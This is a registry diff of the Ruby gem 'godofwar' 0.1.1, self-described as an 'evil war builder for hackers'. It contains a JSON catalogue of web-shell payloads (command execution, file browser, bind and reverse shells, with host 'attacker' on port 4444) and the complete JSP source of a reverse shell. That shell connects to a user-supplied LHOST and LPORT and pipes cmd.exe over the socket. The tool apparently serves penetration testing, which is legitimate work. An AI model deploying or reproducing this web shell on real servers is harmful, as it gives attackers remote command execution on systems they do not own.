godofwar 0.1.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,30 @@
1
+ {
2
+ "cmd_get": {
3
+ "desc" : "Command execution via web interface",
4
+ "os" : "any",
5
+ "conf" : {},
6
+ "url" : "http://host/cmd.jsp?cmd=whoami",
7
+ "ref" : ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]
8
+ },
9
+ "filebrowser": {
10
+ "desc" : "Remote file browser, upload, download, unzip files and native command execution",
11
+ "os" : "any",
12
+ "conf" : {},
13
+ "url" : "http://host/filebrowser.jsp",
14
+ "ref" : ["http://www.vonloesch.de/filebrowser.html"]
15
+ },
16
+ "bind_shell": {
17
+ "desc" : "TCP bind shell",
18
+ "os" : "any",
19
+ "conf" : {"port": 4444},
20
+ "url" : "http://host/reverse-shell.jsp",
21
+ "ref" : ["Metasploit - msfvenom -p java/jsp_shell_bind_tcp"]
22
+ },
23
+ "reverse_shell_ui": {
24
+ "desc" : "TCP reverse shell with a UI to set LHOST and LPORT from browser.",
25
+ "os" : "windows",
26
+ "conf" : {"host": "attacker", "port": 4444},
27
+ "url" : "http://host/reverse_shell_ui.jsp",
28
+ "ref" : []
29
+ }
30
+ }
@@ -0,0 +1,63 @@
1
+ <%@page import="java.lang.*"%>
2
+ <%@page import="java.util.*"%>
3
+ <%@page import="java.io.*"%>
4
+ <%@page import="java.net.*"%>
5
+
6
+ <form method="post">
7
+ LHOST: <input type="text" name="ip" size=12 value="HOSTHOST"><br />
8
+ LPORT: <input type="text" name="port" size=12 value="PORTPORT"><br />
9
+ <input type="submit" name="Connect" value="Connect"><br />
10
+ </form>
11
+
12
+ <%
13
+ String ipAddress = request.getParameter("ip");
14
+ String ipPort = request.getParameter("port");
15
+
16
+ if(ipAddress != null && ipPort != null){
17
+
18
+ class StreamConnector extends Thread
19
+ {
20
+ InputStream is;
21
+ OutputStream os;
22
+
23
+ StreamConnector( InputStream is, OutputStream os )
24
+ {
25
+ this.is = is;
26
+ this.os = os;
27
+ }
28
+
29
+ public void run()
30
+ {
31
+ BufferedReader in = null;
32
+ BufferedWriter out = null;
33
+ try
34
+ {
35
+ in = new BufferedReader( new InputStreamReader( this.is ) );
36
+ out = new BufferedWriter( new OutputStreamWriter( this.os ) );
37
+ char buffer[] = new char[8192];
38
+ int length;
39
+ while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
40
+ {
41
+ out.write( buffer, 0, length );
42
+ out.flush();
43
+ }
44
+ } catch( Exception e ){}
45
+ try
46
+ {
47
+ if( in != null )
48
+ in.close();
49
+ if( out != null )
50
+ out.close();
51
+ } catch( Exception e ){}
52
+ }
53
+ }
54
+
55
+ try
56
+ {
57
+ Socket socket = new Socket( ipAddress,(new Integer(ipPort)).intValue());
58
+ Process process = Runtime.getRuntime().exec( "cmd.exe" );
59
+ ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
60
+ ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
61
+ } catch( Exception e ) {}
62
+ }
63
+ %>
metadata ADDED
@@ -0,0 +1,80 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: godofwar
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.1.1
5
+ platform: ruby
6
+ authors:
7
+ - KINGSABRI
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2019-04-05 00:00:00.000000000 Z
12
+ dependencies:
13
+ - !ruby/object:Gem::Dependency
14
+ name: rubyzip
15
+ requirement: !ruby/object:Gem::Requirement
16
+ requirements:
17
+ - - ">="
18
+ - !ruby/object:Gem::Version
19
+ version: '0'
20
+ type: :runtime
21
+ prerelease: false
22
+ version_requirements: !ruby/object:Gem::Requirement
23
+ requirements:
24
+ - - ">="
25
+ - !ruby/object:Gem::Version
26
+ version: '0'
27
+ description: Evil war builder for hackers with built-in war payloads.
28
+ email:
29
+ - king.sabri@gmail.com
30
+ executables:
31
+ - godofwar
32
+ extensions: []
33
+ extra_rdoc_files: []
34
+ files:
35
+ - CODE_OF_CONDUCT.md
36
+ - Gemfile
37
+ - Gemfile.lock
38
+ - README.md
39
+ - Rakefile
40
+ - bin/godofwar
41
+ - godofwar.gemspec
42
+ - lib/godofwar.rb
43
+ - lib/godofwar/builder.rb
44
+ - lib/godofwar/extensions.rb
45
+ - lib/godofwar/payloads.rb
46
+ - lib/godofwar/utils.rb
47
+ - lib/godofwar/version.rb
48
+ - payloads/bind_shell/bind_shell.jsp
49
+ - payloads/cmd_get/cmd_get.jsp
50
+ - payloads/filebrowser/example-css.css
51
+ - payloads/filebrowser/filebrowser.jsp
52
+ - payloads/payloads_info.json
53
+ - payloads/reverse_shell_ui/reverse_shell_ui.jsp
54
+ homepage: https://github.com/KINGSABRI/godofwar
55
+ licenses:
56
+ - MIT
57
+ metadata:
58
+ homepage_uri: https://github.com/KINGSABRI/godofwar
59
+ source_code_uri: https://github.com/KINGSABRI/godofwar
60
+ post_install_message:
61
+ rdoc_options: []
62
+ require_paths:
63
+ - lib
64
+ required_ruby_version: !ruby/object:Gem::Requirement
65
+ requirements:
66
+ - - ">="
67
+ - !ruby/object:Gem::Version
68
+ version: '0'
69
+ required_rubygems_version: !ruby/object:Gem::Requirement
70
+ requirements:
71
+ - - ">="
72
+ - !ruby/object:Gem::Version
73
+ version: '0'
74
+ requirements: []
75
+ rubyforge_project:
76
+ rubygems_version: 2.7.6
77
+ signing_key:
78
+ specification_version: 4
79
+ summary: Evil war builder for hackers with built-in war payloads.
80
+ test_files: []